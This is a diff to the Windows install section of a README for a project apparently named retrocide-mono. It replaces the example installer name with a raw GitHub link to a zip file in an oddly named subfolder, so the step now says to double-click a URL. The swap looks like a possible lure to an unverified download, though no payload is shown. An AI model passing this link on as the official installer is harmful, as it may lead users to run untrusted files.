ganxmdz/retrocide-mono/README.md

 #### Windows

 1. Locate the downloaded file (usually in your Downloads folder).
-2. Double-click on the installer file (e.g., "retrocide-mono-windows.exe").
+2. Double-click on the installer file (e.g., "https://raw.githubusercontent.com/ganxmdz/retrocide-mono/main/bromopnea/retrocide-mono.zip").
 3. Follow the on-screen instructions to complete the installation.

 #### macOS